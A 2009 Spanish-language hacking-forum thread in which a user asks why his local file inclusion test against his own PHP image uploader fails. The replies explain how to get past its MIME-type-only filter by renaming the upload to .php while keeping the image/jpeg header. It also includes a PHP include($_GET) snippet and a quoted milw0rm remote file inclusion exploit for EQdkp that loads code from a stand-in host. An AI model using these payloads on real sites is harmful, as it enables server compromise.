Duda con LFI

Pazador · 26 Julio 2009, 00:10 AM

Hola a todos, hice un script sencillo de prueba que sirve para subir imagenes al servidor que funciona perfectamente, supuestamente puse un "filtro" para que solamente se pudieran subir imagenes de extensiones mas usuales, el supuesto filtro es este:

Código [Seleccionar]

if($tipo=="image/gif" || $tipo=="image/jpg" || $tipo=="image/jpeg" || $tipo=="image/bmp" || $tipo=="image/png"){

lei acerca de esta la vulnerabilidad de este filtro, que permite subir archivos con codigo php y cambiandolo de extension a jpg, pues.. eso intento quiero probar eso pero no me sale nada.

Para probar esto cree un archivo jpg al que llame "fake.jpg" pero antes le puse algo como esto:

Código [Seleccionar]

<?php 
$bug=$_GET['bug'];
include("$bug");
?>

ahora que subi la falsa imagen y tengo la url directa, intento hacer lo que llaman LFI pero solo me sale esto:

Hay algo que me falto hacer o hice mal??? se supone que deberia mostrar el codigo php o contenido del archivo txt

PD: las imagenes reales jpg si las muestra correctamente

WHK · 26 Julio 2009, 01:52 AM

hay dos problemas, lo primero no puedes visualizar contenido html desde un archivo con extensión de imagen porque el firefox no te lo va a interpretar, segundo no puedes ejecutar comandos si la extensión no es un ejecutable de php, aunque el archivo sea txt, jpg, etc no se va a ejecutar.

Intenta subir el archivo modificando la cabezera del upload reemplazando donde la extensión del archivo de jpg a php sin modificar la cabezera donde dice el tipo de archivo "image/jpeg"

Pazador · 27 Julio 2009, 03:02 AM

ah ok deacuerdo, todo quedo muy claro y gracias por responder... entonces no es posible burlar ese filtro?? supongo que no

Og. · 27 Julio 2009, 08:15 AM

Cita de: WHK en 26 Julio 2009, 01:52 AM
hay dos problemas, lo primero no puedes visualizar contenido html desde un archivo con extensión de imagen porque el firefox no te lo va a interpretar, segundo no puedes ejecutar comandos si la extensión no es un ejecutable de php, aunque el archivo sea txt, jpg, etc no se va a ejecutar.

Intenta subir el archivo modificando la cabezera del upload reemplazando donde la extensión del archivo de jpg a php sin modificar la cabezera donde dice el tipo de archivo "image/jpeg"

Cita de: Pazador en 27 Julio 2009, 03:02 AM
ah ok deacuerdo, todo quedo muy claro y gracias por responder... entonces no es posible burlar ese filtro?? supongo que no

te acaban de decir que intentes subiendo un archivo php pero sin cambiar la cabecera

Pazador · 29 Julio 2009, 01:39 AM

pero si intento subir un archivo php (antes de hacer este post fue lo primero que intente hacer) no se podria subir ya que el filtro no permitira subir archivos que no sean imagenes $:-\$

Pazador · 3 Agosto 2009, 23:27 PM

disculpen que insista preguntando sobre la misma duda pero aqui encontre un ejemplo de lo que tanto comentaba (y se supone que funciona)

CitarTitle: EQdkp <= 1.3.0 Remote File Inclusion
URL: http://www.eqdkp.com/
Dork: "powered by EQdkp"
Author: OLiBekaS
greetz: Skulmatic, weleh, brockencode, and all #papmahackerlink crew

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls

# milw0rm.com [2006-05-07]

se supone que esto debe funcionar no?? o es un bug obsoleto?? o el enano milw0rm se equivoco?? (milw0rm me suena a nombre de un enano de cuentos de hadas

) porque el si puede ejecutar codigo arbitrario y yo no, o tal vez la unica solucion seria cambiar mi imagen fake.jpg a fake.gif??

... aun asi tengo el mismo resultado

lo encontre aqui http://www.milw0rm.com/exploits/1764
necesito una explicacion

braulio-- · 5 Agosto 2009, 14:00 PM

Fijate que el archivo con el cual intentas hacer la inclusión es un jpg, el servidor, aunque la imagen tenga código php , lo va a interpretar como una imagen.

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
Ves la diferencia?
Aquí te dejo un tutorial de como bypassear los filtros.

Pazador · 6 Agosto 2009, 03:02 AM

Cita de: braulio23 en 5 Agosto 2009, 14:00 PM

Fijate que el archivo con el cual intentas hacer la inclusión es un jpg, el servidor, aunque la imagen tenga código php , lo va a interpretar como una imagen.

Exploit: /includes/dbal.php?eqdkp_root_path=http://yourhost/cmd.gif?cmd=ls
Ves la diferencia?
Aquí te dejo un tutorial de como bypassear los filtros.

gracias por la respuesta

ahora si que ya voy entendiendo, leere el link que esta bueno, saludos